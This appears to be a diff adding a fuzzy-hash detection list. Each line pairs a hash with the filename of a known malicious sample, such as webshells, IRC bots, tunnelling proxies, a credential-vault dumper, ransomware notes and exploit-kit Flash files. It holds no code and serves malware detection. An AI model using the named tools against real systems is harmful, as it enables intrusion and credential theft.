+384:FTOCnQnAJsznh9m2mwLTEtltCj2gQgrmUfycqfQNUvhdWQhv05Sh4Z6upKmM:HJwmUmiYXmM,"Cyber_Shell_by_Pixcher.v1.0.php.txt"
+384:fS/LW/Jtp07Kjw5vCMx6Ceb47d58fQlbA0:ELWW7Kc5vHBeb47d584lbx,"shell.php"
+384:fS/LLJvv/07KjwQvCMx6Ceb47d58fwlbA0:EL1M7KcQvHBeb47d58olbx,"shell.php"
+384:fk9uEA3I9ATr6U0ptbjsdag/Lf8fYMgV1j:fk9uv3ISb0ptbjkagTUfYfp,"gamma-webshell.cgi.pl"
+384:fjdxxeiAI2BdW/8l95wb+YAYI2532219SxZHqHGthSRlOZt/3:ffxei+dSCLwb+cDAxTZt/,"mysqlwebsh.php"
+384:FGzDv88mTWXLDb5HTmjGCsgeBHO34EjHaHgA0h:QzDmTWXLDb5HTm/t3NHtAW,"INSTRUCTIONS_FC83AB84.html"
+384:FGzDv88mTWXLDb5HTmjGCsgeBH2H4EjHMHgA0s:QzDmTWXLDb5HTm/VHNH7A3,"2016-02-05-Angler-EK-CryptoWall-decrypt-instructions.html"
+384:FGzDv88mTWXLDb5HTmjGCsgeBH2H4EjHMHgA0h:QzDmTWXLDb5HTm/VHNH7AW,"2016-01-04-HELP_YOUR_FILES.HTML"
+384:fgMLstd6dybmOfOwDnDgqt7zaAkQfd43+ybKGt5p:f3stwdAmwPYgftRyOGtv,"Shellbot_IRC_Bot_by_devil.v0.1b.pl.txt"
+384:/FFpa2FOiOkswom4/2BLnNdxBtZWHU4ILDOnrRkk6AL87wZcbA:9FAJHkomHNWHU40Q6Ao7wZcbA,"2016-05-26-Rig-EK-flash-exploit.swf"
+384:FEWnWLRt7mGOYchw0F2VGjAxzNpzTwILUA5XaaMD/C9EhIyWQjAkSxyu48uyaIAX:FnnhwCkwILj5sVsxDvLAWvbZq,"Mysql interface v1.0.txt"
+384:fdDXg59X9C9lmueVVJ8LzVbKwMxPJQznlvXXCw8s:659Xwjmuewz7l/Cw8s,"r57.txt.2"
+384:fc/LW/rtp07Kjw5vCMx6Ceb47d58fQlbK0:KLWY7Kc5vHBeb47d584lbz,"Laudanum PHP Shell.php"
+384:Fc2WhKWkzXX/L3fnAyfXcNHbMb4LPRq7z31pOb7eyap1iVL5/MORVpeYTiCzYf5q:FcyPGPRqVEnP/MgVpeYTiGR2k,"MySQL_Web_Interface_Version_0.8.txt"
+384:Fc2WhKWkzXX/L3fnAyfXcNHbMb4LPRq7z31pOb7eyap1iVL5/MORVpeYTiCzYf5p:FcyPGPRqVEnP/MgVpeYTiGR2j,"MySQL Web Interface Version 0.8.txt"
+384:fa4pwNoVTOI9vhihcncQvTsO3t+2KrrBiwV/8:y4pyoVyI9vh6cncKTsO3t+2KrrBg,"spexec.aspx"
+384:f7wMJlsIwxX/7BLhOvO5PbdbFsc8aAYAXkiu30xH:DN6IwxdLhOvubdb2c8aAciTV,"anope-ircd-install-proc"
+384:eYJvf0oukcegyXeIZ9Rmqpg6KvXCFhkmTMdo/AtAJXc:eNoukcegyXeIZ9Rmug6KvXCFhkmTMdo6,"Get-VaultCredential.ps1"
+384:eW/Te8iNjE//+4RFmPuKhhsgoracc+Pa8G8SNJKcv65YO7YaBXsxgV2wufFUdiZB:eW/TetNjy+4R0Jhhsguacc+y8xSNgcvD,"Delivery_Notification_00268768.doc.js"
+384:EKZp8dA0PutKNTn6ySYQxRT+PnGVcExoTJkfA9VxZe4ZYfwfYieX:rZIPXTn6yZQxRKnGVcy0e+TYiYieX,"2016-08-10-Magnitude-EK-more-html.txt"
+384:ekbF29ZwMiepVPYKI7f0Ic1hGXW3y15h/D3H:7bF29ZukvI5cGW3y1T/D3H,"FaTaL-Shell-v1.0.php"
+384:ek3Y6466QeMiepVPYKI7f0Ic1itXOjy1d2SBbqG:73yQUkvI53ROjy1subqG,"fatal.php"
+384:ek3Y6466QeMiepVPYKI7f0Ic1itXOjy1d2SBbqEIS3:73yQUkvI53ROjy1subqK,"fatal.txt"
+384:ehsAP3skAzj3IZKJIdreSE1A/Icdmds3DYo6F+Z8VOn:qs6rJZeqIcmiT1dZln,"2017-02-22-pseudoDarkleech-Rig-EK-flash-exploit.swf"
+384:eEW3ACkHT/H1L2/IPlQ6Kr+J4xFuIIQXjUrI/j0DoL779I0DpGuYzJZmmfA1NoYz:eSQ1FuIIkFQPuYzSmfA1jb0+,"Mysql_interface_v1.0.php"
+384:eEW3ACkHT/H1L2/IPlQ6Kr+J4xFuIIQXjUrI/j0DoL779I0DpGuYzJZmmfA1NoYD:eSQ1FuIIkFQPuYzSmfA1jb08,"Mysql interface v1.0.txt"
+384:eEW3ACkHT/H1L2/IPlQ6Kr+J4xFuIIQXjUrI/j0DoL779I0DpGuYzJZmmfA1NoY0:eSQ1FuIIkFQPuYzSmfA1jb07,"Mysql_interface_v1.0.txt"
+384:EEON7Z4q4jH5D4sjXTj7IR7s3MprJroUYEfuTjp25hgnf2BcIP:EEO7Z4qu5EsjjjslGMvoFquTj6P,"2016-06-24-page-from-fiocchidiriso.com-with-injected-pseudoDarkleech-script.txt"
+384:edjbpAwhwLwKYMTJrlHAHNY8g1iqvkWULlUKwNFZgngRqqXHFFNZugDOf4:4LWk4Mg1iqieNpIq3FFNZ9H,"a.css"
+384:ecukaU2Wyrey6kxdOrsuOzDRN2HK6hDwhRu3LT/KKtmQxhfwSY:e3Ayb6VrCzDRN2HyvuP/KMOSY,"2016-02-05-page-from-open-sankore.org-with-malicious-script.txt"
+384:ECpSSvy20UDSsvigG1ymFkf8P1+RRh44tU5k93P:ECjv0U+mi8mFM8PMsk93P,"2016-05-23-page-from-oakfarmsdairy.com-with-injected-pseudoDarkleech-script-second-run.txt"
+384:eAPe4BgoDSmNRctQubQetsI9VVYT1OcH5yG2iXReDOQ8sbgQHeEdK:eA1ImDcauE7wVVc1O6QweyegOa,"phpspy_2013加密-obf.php"
+384:e69h1QjsIC2kXAQxFzI9lUALZylM7UZkrneGmzzzzzzzzCM+E+E+E+E+E+E+ESf:eGu4dfXI9C+qbGPf,"PHP Shell3.jpg"
+384:dwNG5SWDaezttYKhHHxAXelKQHo1f5oCy0NfwrkS7FKQ4krUxuu/UCvNr/NmYh2n:cG5SbWhxyelW1fRRfwQSLrUxtNxh6bhh,"poison.php"
+384:DWEc3zOYcKSwIoVoELtIXZnZJjKSwz6OXZnZJr:KEwzOYcPwjGbXZnZJjPwz6OXZnZJr,"MaGoNeRo.jpg??"
+384:DoUxduRCuDqX42ATcXBg4u4iii6iKiDi1iRiDi6in7vSM+8n4Yn5y9n:ZuRWXuTZ4GLjzmkYmjnrSM+gW,"netspy.jsp"
+384:DMpxQQNISQ68QI0Q0iQ2HpwqDpstf5dIbKGJQLMDK6:DmWQWd6DI70thqDp2L0j,"Thumbr.php"
+384:DMpxQQNISQ68QI0Q0iQ2HpwqDpstf5dIbKGJQLMDI:DmWQWd6DI70thqDp2L0c,"Thumbr.php.3.002"
+384:DMpxQQNISQ68QI0Q0iQ2HpwqDpstf5dIbKGJQLMDd:DmWQWd6DI70thqDp2L05,"Thumbr.php.002"
+384:DMpxQQNISQ68QI0Q0iQ2HpwqDpstf5dIbKGJQLMD7:DmWQWd6DI70thqDp2L0v,"Thumbr.php.3.001"
+384:dgAGdN+jPvAMq/fgWu1yc0kvFHBPhNeq6Aoe:dgBdN+bAMq/fE10kxBPhNeq6AH,"tunna_exploit.rb"
+384:dD/54vtc46/lWlUSTL1U3zU59HJ1xLCz1SHyCLKX2BIoZfLjyBfpImuUPTiD9m:dDTw91U3zU59HJ1EJSS0KX2eo4R5qQ,"shell1.jsp"
+384:dbNH9jqW1zhwTiOyxFzMo78egjmxJ5irfPUlMFx:dPew66gyxJ5irfPUlMFx,"2016-06-28-page-from-monavocatparis.fr-with-injected-script-pointing-to-gate.txt"
+384:d92G8JIcGK1/thsq86nJd8ERRN5Md/ZolB6:d998JXG6rsq86nJmE52d/ZolB6,"GRP WebShell 2.0 release build 2018 (C)2006,Great.php"
+384:d77+aMrlWdwUM03sZqQIOnmYqM/IPERlokyxDROt7Z:QaEw39Qbnmk/FYLs1,"jquery.flexslider.min.js.txt"
+384:D36Dyh7L7a1rqEymNUTkVB0fDSsvT9uRAvdpNyqzHNyqHHNypmHNtPjviKHvzMHp:j6Dyh7L7a1rqEy237Y/Q0AjaOL,"Backdoor.ASP.Ace.ar-Asp站长助手6.0.asp"
+384:+D2z5DtEz95MZKYFmFeLF6gqnYwfxDp+xU+8NIKDHK:+D2z3EzHiYgqYwfD+xv67K,"Silic_Group_Hacker_Army_PHP_webshell-404.php"
+384:CyiXHGX1S6bAinuuvKxLMt2uoLEV003rOoHaAT+:CyiXmFLbAinuEKxLMHoZErOo6l,"injektor.php.71"
+384:CyiXcmdwHo4TxAinuuvL8MLMt2mo+vhdViguNhdf2xYtt6:CyiXc4wIYxAinuEL8MLMno+vhd/uNhd2,"injektor.php.78"
+384:CyiX1nGXLvAinuuvLBLMt2nU9kLavZTOkq:CyiX1GzAinuELBLMCU9LZlq,"injektor.php.67"
+384:CyiX1ndkk2AinuuvL8MLMt2zT03NtNeQt6:CyiX1d+AinuEL8MLMBag6,"injektor.php.91"
+384:Cyiu+TOIAinuuvOMLMt2JopjdBjXGtnQCic15+:CyiuwAinuEOMLMhpjfGFZic1k,"injektor.php.92"
+384:Cyiu+GXb5imAinuuvbLMt2bib16nNVySt6:CyiuXfAinuEbLMf6nyS6,"injektor.php.69"
+384:CyisFKW5H4yn7AinuuvKsMLMt2yYel/LmSbYe6Ot6:CyisFKOYS7AinuEKsMLMjxYSbx6m6,"injektor.php.86"
+384:CyiRUHsPZUAinuuvKsMLMt2uKd3R45TWTuQKdkgLP:CyiqRAinuEKsMLMgdyZWT0dxT,"injektor.php.94"
+384:CyiRT/BqeAinuuvL7MLMt25PX+SNQEAiRRSLnu+:CyiJkeAinuEL7MLM3GAiRRwH,"injektor.php.75"
+384:CyiRdkTfAinuuvL8MLMt2SMc1Kbr1hBkq:CyiL4AinuEL8MLMSf1Mq,"injektor.php.89"
+384:CyiQuU092mnAinuuvKmLMt25JJSsjzeJAkq:CyiQ7KAinuEKmLMInj47q,"injektor.php.73"
+384:CyiPudZXd8+dAinuuvKsMLMt21JtbnwIxP:CyiPQZtAinuEKsMLMkbT,"injektor.php.82"
+384:CyiPdm5HeAAinuuvL8MLMt26JiHQ95NXt6:CyiPd+hAinuEL8MLMFSQz6,"injektor.php.85"
+384:CyilwT/OtiOftikQFAi7hy1wUgMW2oi9riatwox:CyilkIieikQFAi7hIlgMbpiaV,"idx.txt.277.005"
+384:CyilWS/OtEftCQFAi7hy1wUkMW2ox9rqaDY:Cyil3IwCQFAi7hIlkMUpqr,"idx.txt.277.007"
+384:CyilWe/Ot4ftOQFAi7hy1wUIMW2oA9rEOs6D7:Cyil3IkOQFAi7hIlIMdpEOs6X,"idx.txt.277.003"
+384:CyilsgK/OtU8ftUqQFAi7hy1wCZMW2oL41x9rUVdZy:CyilMIUIUqQFAi7hILZMI41xpUI,"idx.txt.277.001"
+384:CyilrSR/OtAigftAimQFAi7hy1wUtMW2oh9rAiqiHAzA1A:CyilIIA3AxQFAi7hIltMkpANs1A,"idx.txt.277.011"
+384:CyilQr/OtRftNQFAi7hy1wCCMW2oj9rBSMZ:CyilAIbNQFAi7hILCMep9,"idx.txt.277.008"
+384:CyiloIn/OtRftNQFAi7hy1wlRMW2oo9r4yUy:CyilocIbNQFAi7hIsRMZp4K,"idx.txt.277.002"
+384:CyiLm4iaxzAinuuvOMLMt2N9avhfkVaYKt6:CyiL4czAinuEOMLMSEFkVDK6,"injektor.php.81"
+384:CyilgM/OtrW+ftrW0QFAi7hy1wUUMW2o89rrWzWGcHc1A:CyilzIrhrfQFAi7hIlUM1pryd1A,"idx.txt.277.006"
+384:CyilER/OtdfthQFAi7hy1wClMW2o5s39rZbVU9k1A:CyilqInhQFAi7hILlMP3pBVUu1A,"idx.txt.277.009"
+384:Cyil8t/Ot2ftcQFAi7hy1wUrMW2o5ny9rGnbWKCR1A:CyilmIGcQFAi7hIlrMEypTKC1A,"idx.txt.277.010"
+384:Cyil+4l/OtDft/QFAi7hy1wlSMW2oM9rylII1A:Cyil1IB/QFAi7hIkSMppON1A,"idx.txt.277.012"
+384:Cyil3x/Ot9ftBQFAi7hy1wlIMW2oa1R9rtmxh:CyilBIHBQFAi7hIkIMb1Rpty,"idx.txt.277"
+384:Cyil367/Ot1Ikft1IiQFAi7hy1wl0MW2oTa9r1I3InzH5fYNy1A:Cyil3OI1bQFAi7hIk0MbpfrFYw1A,"idx.txt.277.004"
+384:CyigWdP2cL9AinuuvL8MLMt2cru2qBcxOIP:CyigoTAinuEL8MLM4Bg,"injektor.php.80"
+384:CyiCmr5zCwAinuuvmLMt2PgMvBZnhfGt6:CyiCuewAinuEmLMeLnhm6,"injektor.php.68"
+384:CyiCmdZXnOJmOWAinuuvtMLMt2LuOSKFtOlOVqSt6:CyiC4Z3OEOWAinuEtMLMFOBtOlOYS6,"injektor.php.76"
+384:CyiBUgHUxxuAinuuvL8MLMt2234c2SMFCyJbMkq:Cyi6g0vuAinuEL8MLM5oHFCyJbfq,"injektor.php.93"
+384:Cyi7nGXkbDoAinuuvbLMt2BNNDM8mCbO0g+:Cyi7GpAinuEbLMAHDmQn,"injektor.php.72"
+384:cu2jx50QuHXGiSlLIr26XB7N3LTExo7ncR24rrClOmhK3bIl2OxP4HDcStjKa3kj:WxaQuVaS7lvEOg+NP4jbmQG,"2016-07-05-Magnitude-EK-flash-exploit.swf"
+384:cjMYRb7Xn4PVhZTYYNmwDlOqLhL0TSHYh/mwzGQE:c3R30bT5TIqLhL0TS4h/mjn,"cgitelnet.txt"
+384:cjMYRb7KPn4PVhZTYYNmwDlOqLhL0TSHYh/mwzGQE:c3R3K8bT5TIqLhL0TS4h/mjn,"telnet.pl"
+384:cjMYRb708efPwZTYuDKssrlf31iNCznjjYGQb:c3R37MS7srlf31icznjnq,"telnet.cgi.txt"
+384:choG53d62u4nKL+XXRf/X2/gHzv/0L0f/IS3:clN636w+xf+Q/0L0R,"zaco.txt.001"
+384:choG53d62u4nKL+XXRf/X2/gHzv/0L0fE:clN636w+xf+Q/0L08,"zaco.php"
+384:CFqcgiJc0RsQocBg+tb8IxxYTyybbXeS0CJkL2NlCJp2SNuTSF:CIcfc0Rs12YTrbO397ySF,"2016-07-11-Magnitude-EK-more-html.txt"
+384:c09D6DbfJC5oyrHWxKUVOos37bQjmN0jjaSHyCLKXUZakH17VvYmxvSut9x:R9DotiWgUcos37sjL+SS0KXuaex,"JFolder.V0.9-win32-data02.jsp"
+384:BSEW3K0kzVV9LHdg6dXcNHJYJ4xFLIe8N1tLB7eiKR5izL5aM9yRVzGsTiCzYzPC:BSGwFLIe6FraM9EVzGsTiGm2j,"mysql.php"
+384:BSEW3K0kzVV9LHdg6dXcNHJYJ4xFLIe8N1tLB7eiKR5izL5aM9yRVzGsTiCzPPXo:BSGwFLIe6FraM9EVzGsTiGv2T,"MySQL Web Interface Version 0.8-mod1.php"
+384:BplaR2xqYtNkaWmXcpkfR9M+gQWX7t8N5eUAYZ2HaaQL82VZfk:BnC2xqYtjcpkfQ+gbI5WQdXLpFk,"bbb2.php"
+384:BoklppUYO21P6O46vIkpzQuuDrry/UCbhAnh7GJIvzz7tvG/2qtJ:CQpUl26OzvIkyhrry/Kh7GCvLtPqtJ,"devshell.cfm"
+384:bNNRytNwUx7PRlJIRtskPcyrZFvV33gve/8EQdTHm5jfV:bdy3zRlJMKgtF9gve/89THmfV,"GFS_web-shell_ver_3.1.7_-_PRiV8.php"
+384:bNNRytNwUx7PRlJIRtskPcyrZFvV33gve/8EQdTHm5jfuIS3:bdy3zRlJMKgtF9gve/89THmfE,"GFS_web-shell_ver_3.1.7_-_PRiV8.txt"
+384:bNNRytNwUx7PRlJIRtskPcyrZFvV33gve/8EQdTHm5jfF2iK5NgnF1Z:bdy3zRlJMKgtF9gve/89THmfFVnrZ,"GFS web-shell ver 3.1.7 - PRiV8.txt"
+384:BmrQX1f7GkAxxIlLQoMfxaXv/hVzzsvQmYx39zwlmtJQsit4MyqQb9ZfyllWSMda:c0X1TGpxxIlM9fc3zwYbVi6gHb,"user-agents.txt"
+384:bL5RnVlzNOvjZR8tKmsV7jyVhhCjpXt7swAOAdblTHozi1r8gpzmz9apZ2:bHnVleB1WrV2,"reGeorgSocksProxy.py"
+384:BKrQuheGK0PBkuG585qG9xAu370chth93n:m6SkTSrX70chDh,"Web-shell (c)ShAnKaR.php"
+384:Bk+MhjwNA7m3BuntBdZfthXjxL+gyulQdY3oWFqRMjRZPiIdyAJ:Bk/Ma7m3IntB7ftxsgy+F3oWFrPVdyAJ,"connectionpool.py"
+384:BhrMW/i9hLC2+d71dlYdZi3B7oBBxeRtosUwcjhmbGNRaCwFcSL+bDcecbrLADTU:Bxf/i9hqJ8uYPwoZw0UCNRa5EkAHk,"Backdoor.ASP.Small.s.asp"
+384:BGQRnru6Rj9pZj4XSRdwUQlK/w+kZvgW0ffiFJTvvbq:BGKZj42g0ffYxvu,"2016-02-11-www.pdcmemphis.com-wp-emoji-releae.min.js.txt"
+384:bGc5wJytewESerEuO4Tkt5KpH9re7JGSwGPyZnlGxObuoNiI4G/:bGEwJytUSewuO4gt5KpHFycSwGWQxUn7,"404.php"
+384:bfHqEN8g+XFIf83hP/17sgC3QgkBiE0Wy:WEN8g+1If834gRZ0Wy,"JspWebshell.v1.2.jsp.txt"
+384:B/e6TD5Qfb3TgO2TlZX1L82y6o6wYABtx5IDf2fb3TgO2TlZX1L82kwZMZBc:B/e6TybcZ6PxdYitxYObcZ64KBc,"JSP无组件实现WEB上传.rar"
+384:b26nYITPOc2kRcM5QOxU2qyQdbjr2aVD77r/j8079lSHnzv/x3K7Y:zYItMMdx8jU5j+Y,"phpspy_v1.5.php"
+384:aYQOgiUIyGyURk8pUehUTDtz4/gbwN3dSzZVLladhlr:dQOaGbRktfS/eitaHLK5,"devil_shell_by_devil_v2.0.php.txt"
+384:/aydRey3H5Tn9dTULcTQa317WtcFR4XLBuH7Jfls7/un0QA59Lfejfna9po:S1yX9IR4C4+XLSVNs7/u1AXLfejfApo,"diam.txt.9"
+384:/aydRey3H5Tn9dTULcTQa317WtcFR4XLBuH7Jfls7/un0QA59Lfejfna9pBQOLr:S1yX9IR4C4+XLSVNs7/u1AXLfejfApBD,"diam.txt.12"
+384:/aydRey3H5Tn9dTULcTQa317WtcFR4XLBuH7Jfls7/un0QA59Lfejfna9pBQOLJ:S1yX9IR4C4+XLSVNs7/u1AXLfejfApBh,"diam.txt.4"
+384:avv3ksIq4yzhGyHgzHTN9WkZI4YefQfPVQ0WYmfJ0Gv1hNFMj:evksoaczHTN9I4YeCtQzhdbSj,"2015-007-PowerPoint.zip"
+384:Av7xsJ1GH8IPrvAutS3KSpPJrSUf03uXAYtRH5S8ask+Alcgkq6:m7xsiHFTvAqQfpPJvVA0REsk+qNkN,"pas.php"
+384:ASb2Xah7YjSXuKx6TofSPrh7Yok3dGKzG7xSTEmWk3mtBrh7YYfK:Azqh7rx6Teurh7LK69dLtBrh7PK,"LNKBackdoor.ps1"
+384:aOhthR7zxJXLvY58pDWkaGmbjt+H1ITB9i2LwxdWLykuS7agbokNU3BWbvM5dk0q:aKfXLA58WGY1l77,"c.css"
+384:AiHpHCLiWZt/Ig/Lxa7qUrlckklPey5Bw5FTTh6ZMAiD40U7X4kQIlodpzFZ:AApH+iWZ5xTxAqol39JTFD0lCFZ,"CrystalShell v.1.txt"
+384:agpgWbTq8sREJVmH80PH5p+Z/U/v/S/9/o/7UVQF/z/F/sbqnh23FzThqlTLcR:agpgWbTq8sbkZsHq1QjcQF/jsRQcR,"xcu_cmd.asp"
+384:aeo0X6tc46/lqJ74L9U3LvRBbb1sUlyCzEjcsHoPnhzE/mQkPAP2:aeFX1i7oU3LvRB3KUEmEjcsHoZn,"Silic_Group_webshell.jsp"
+384:+AebOnTHaYCQbyvIT+rUFJ8pvVZ0jYFx9ztTm:VqEzajQbypwXm/Hxb,"CAR014 151239_4.doc"
+384:aAmNV8AmN+qYiMrn2j1m5hdHP9P3/orDq8d4mKQ2ecgjFDKvU8Py:TmNXmN6n64B8dRKy,"xw.php"
+384:A4aa4My5Kjs6AdgRfcYVXinvcmft4PyrffPBmR9KFE:Axa4My3gNmjYaFE,"lol.jpg.1"
+384:a1yA5tqKD5KVmANVMkokfVQ8TXfQMErgLbVkAbKRlFCddmtExoCAn:aU4tqLQBkTz62kAUFYdHxgn,"20160203-050623-VrD@L2juZ1YAAHDNB28AAAAE-file-D77r6J.1454439984_1"
+384:9XKkfEtBD9Oq27KAPey5B5omWUEGZTTh6Zbsqm0Hk:9qezvEeTTdqm0Hk,"load_shell.php.php.txt"
+384:9XKkfEtBD9Oq27KAPey5B5DxmWUEGZTTh6Zbsqm0Hk:9qeyvEeTTdqm0Hk,"load_shell.txt"
+384:9XKkfEtBD9Oq27KAPey5B5DxmWUEGZTTh6Zbsqm0H1ISH:9qeyvEeTTdqm0Hf,"load_shell.txt.001"
+384:9v+JgwZJCUZy7DjA9cZjlb/jfLMNRtjZWHc/5xz/pGSJDT3WWHjkC6qD6:Z+JLZZ6ZjR/jDMpIHchbn6nW+,"2017-03-02-Nebula-EK-flash-exploit-2-of-2.swf"
+384:9T6DbfJC5oyrHWx0UDOos3xMPaljaSHyCLKXUZ2IkH17w/mMvFzt9W:9TotiWyUKos3xMP2+SS0KXu2IwF,"非常牛逼的Jsp大马.jsp"
+384:9J/gO/X9bBhQr6YBNAVgHfJRrwrwU91ivcCC4enh+qYqjc9x08zkKnQJ2wRfyJkR:9J/gORBhQrFkVohRrwP4yC0TVP,"generic.txt"
+384:9BdHlYOnMAjZtUvyUzT56iwcGSJHclPISs54x2wHfOJYnkeFaG2CuveSH/oFsNpv:9tdMoir6BWJwkeFaG2CugB3aRUdq//0c,"grasp.asp"
+384:92suOJp9vCIlb2piXMdekuVfMJCg7LqA5b2xPeC3pK43OYVqQ3rIcmMke9A8nl:o2Jp9vTS1EV04Wl5YPHK8/VZPkej,"d92a433240e792c445415d2813284e37_php.txt.orig.001"
+384:92S8JWdHzeq+64jEd717yrqGIj8ERnVT6aHWaCCw8r01:9N8JWSt6Uq17yrqGIIEHFWaCCw8r01,"GRP WebShell 2.0 release build 2018 (C)2006,Great.php"
+384:91oQAEWIY76SC5ERKNloKO9VgYTmIXizwQCxF3VKVQ:91oQ7YCCR0OKcCFFqF3Vd,"network.php"
+384:8+YYxNzhhMhAblfxwzDKVrp79VOmG2zTa:DYYxNz3MWblfWXKV59QmXq,"priv.php"
+384:8xAc3+Bt4+0sTAtUyNbL+aNmIFeKHS21A9HlF8pzg+aEnnY0EYi:8xAc3+Bt4+0sTAtUyNbL+aNmIFeKHS2G,"dump.php"
+384:8RD+6mn8EL8ZyCqEtUEwCJCpCuiNCeTpnz6oLqb:8RpEgkCqDjeGlkRTpnz65,"link1.jpg??"
+384:8PZdZFOvXbAnW7JFVGyOATX4DuG3+iPHUHx4HKB5HUL:8PpyOAD4Dr+iP0R4qB50L,"bt.php.31"
+384:8HQtr5HuH9xkH8T/tvfYyfq/OCZ62Sr5ux8y6wLMSAaQ96rvn2OrbwLCDCWsIdIu:8HQtrRuZ1XHSOz2Sr5u9lLm96rvn2oke,"reDuh.jsp"
+384:88JPmBsboL3+xMSwEMPvGYxPJtTDXw8LhSPeBD:8/B8fwGYX9NL8eBD,"MySQL Web Interface Version 0.8.jpg"
+384:85NOir52G9QIPt02TDhGPUTZL/ofIwe+9pOgttII/egIiW1JnQ5FHvXUUaTo8x0W:0J5h50chuiLQfIHgttII/XN+JnQbvJc/,"2014phpspy.php"
+384:84YSpHIpP64qacOK7DsbodfdD4RUHxnUBL3HGPlPtaCx/n7k7BL:85Siv/cOwd4RoxUx4lFa87k7t,"EgY_SpIdEr ShElL V2.php.jpg"
+384:81+6pn8EL8ZyCqEtUEwCJCpCuiNCeTpnz6oLqb:89KEgkCqDjeGlkRTpnz65,"link2.jpg.1"
+384:7yi1Gl3zLQd7gsDiADient1PI3Fd1PI3FkcOFQHsMkzEycYL:7yi1QQd7gsuADiAt1Q3Fd1Q3FkhFQHsX,"db.php.6"
+384:7R8e8zWsTNr1Xgo6UG3xbEWE55aIyDW2UCpWr/R:7R8dLgxxbEW05awb9/R,"r57shell.php"
+384:7lY6hEL8ZyCtEt5EQCJCpCuiFCnTpkz6OWg:7lphEgkCtezeGleITpkz6OD,"bot.txt.2.002"
+384:7lxwoELZZyCnS47zE/+mCuiFCnFIkHSNWJ6HiJ:7lZEVkCS4/K+mleIFIkHSNwL,"mad01.jpg.4"
+384:7lT6ELnZyCnS47zE/+mCuiFCnFIkHSNWJ6HiJ:7lWELkCS4/K+mleIFIkHSNwL,"foto45.jpg.2"
+384:7lQwoELZZyCnS47zE/+mCuiFCnFIkHSNWJ6HiJ:7lgEVkCS4/K+mleIFIkHSNwL,"mad01.jpg.5"
+384:7lP6ELnZyCnS47zE/+mCuiFCnFIkHSNWJ6HiJ:7lyELkCS4/K+mleIFIkHSNwL,"foto45.jpg"
+384:7lOwoELZZyCnS47zE/+mCuiFCnFIkHSNWJ6HiJ:7liEVkCS4/K+mleIFIkHSNwL,"mad01.jpg.1"
+384:7lNwoELZZyCnS47zE/+mCuiFCnFIkHSNWJ6HiJ:7llEVkCS4/K+mleIFIkHSNwL,"mad01.jpg.3"
+384:7liwoELZZyCnS47zE/+mCuiFCnFIkHSNWJ6HiJ:7l2EVkCS4/K+mleIFIkHSNwL,"mad01.jpg"
+384:7l5woELnZyCnS47zE/+mCuiFCnFIkHSNWJ6HiJ:7lBELkCS4/K+mleIFIkHSNwL,"p.txt"
+384:7bjasZqjEA5UUqiIGNkOg99ux4uok1PSaf1MaPE+Y4xFyEU4KICHW+XNkK+Yw71q:f1u5ME0c4uoksa2aPEt4DyEv4WRKdF,"2016-06-20-Rig-EK-flash-exploit.swf"
+384:79rhuAPNgSLIkxL78U8CP9vGWKBYtmDFV08cBv0obBx4V/m:71huwgS9xL8CsUZ0obv4Vu,"NTDaddy v1.9.php"
+384:6Z98cxy1nMNKJMzFFw8qhkFtixvhLI+Puug6ZhcnRyv9nH:6ZYV1JMzzqaFtixDZ6nRyvF,"index.txt.2"
+384:6Z98cxy1nMNKJMzFFw8qhkFtixvhLI+Puug6ZhcnRy8:6ZYV1JMzzqaFtixDZ6nRy8,"postfix.txt"
+384:6OIL9kGqKjimdT4RG7yYLPswcW8oe0B4HObbrovzS0TLlMjic5TCG:gpjLimdim3sBHO8LrLlOPl,"2016-05-24-EITest-flash-redirect-from-noreds.tk.swf"
+384:/6n18b8oKgVJTmls4RTxXXSzd27zezrH8WqATYYd7Mk6wRZRj9jrTXV8ji2A9+0h:/KEKBT0vL6qC/gLF5Qaa4,"Backdoor.ASP.Akspy.a-ASPXSpy-v1.0.aspx"
+384:67INQevMfVzbw3+luoyFQonlgAF6hexga7CFBXdmm6WODqxj:ptiVvWujJolgAF6heKaM58mrOC,"2017-02-27-EITest-Rig-EK-flash-exploit.swf"
+384:5tOzx64XlTu3ZopWKXeUoZhId3Muxn4RQ/M2fIfW:5YzXlTiopXiUNxn4si+,"2016-08-10-Cerber-decryption-instructions.html"
+384:5tOzx64XlTu3ZopWA1EUoZhod3Muxn4RQ/62fIfW:5YzXlTioppysNxn4sg+,"2016-08-05-Cerber-decrypt-instructions.html"
+384:5pIznCZRQ3zVt7vgTr+cy4zKmv/aPKtbMiFeDSl2W5wre20PITbyvdFLroDsT+cO:5eDzwByPCAqPpvjHFT+c5lznC,"NTFS_Attribute.h"
+384:5kqGaqHGTPwwb5xY6StFjJgx8T2NP59JXWGmMmu75sPTtwEjibv/OoJ:yqGCRlxY6SlgvNP5PX4vu7czjaF,"ico.png"
+384:5INx1Lo00M8iw4jbEXSuCKQiokWCpWDeR2ghlXh3jHpDwB4Y+vgo:5xSuCKQijbqeoghlxTp8B4Ngo,"killdoor.txt"
+384:59ZfgPU+r/+J9Mk+ylJndhruegN6MgmSZh:5XSU+rGJ9Mk+ylJnPrue3MgmSZh,"qsd-php-backdoor.php"
+384:58JT0N1tXIoB53N9CrSUVU947BATq7Avw9U3fRH/19Z1JeHB37NWRvMtdHB3LsNk:58JT41hdN9jvwy9Z1Sik,"Predator.php"
+384:55UVO604fUVOnVMY5YTy3dHC5jNV9vpij0lb:4Y67cYVMaYTO1CzvpO0t,"2016-07-25-page-from-dicodesrimes.com-with-injected-EITest-script.txt"
+384:4rmrTAC9ce69bFM4swDfT9Y+MKO+Pkjv/0K:4rmXx0bFHhYyOnjvcK,"2017-03-07-Sundown-EK-flash-exploit-2-of-2.swf"
+384:4qfv/3KorVEUFDsYFZFznKVFiYpOC/PM/1Cen2ShKPqi38sW+qWwTU28tA5NLw/M:4q3PKoG4KjiYgC/PMtFnmPqq/OTU28YX,"PHPRemoteView.jpg"
+384:4mSARRLBjstsj+uFpDLWtYOUAr3YMF84/Hjo59kQ3cxrLCI:4mnNs+jxr0REMFb/05STGI,"2017-03-09-Rig-EK-flash-exploit.swf"
+384:4Esl+HlGbzt4Omf8v0xLWyCV4KMbveU+blf/dd:4EzHl0zt4O9v0xLWJmSf/j,"zorg4.php"
+384:4D6eY0D8CyoEtUEL8t8F8Q4w8GT/0wbu2+ZYwq7:4meYq8CyoDy0s3LnT8wbu2+Zm,"byroe.jpg.3"
+384:48wpGqnxG5uE/CzBPYkP75v1tQQQQ3LjbksQvAgTCPHuce:fliKuE/IHVbBg4Huce,"g6priv.txt.001.001.001"
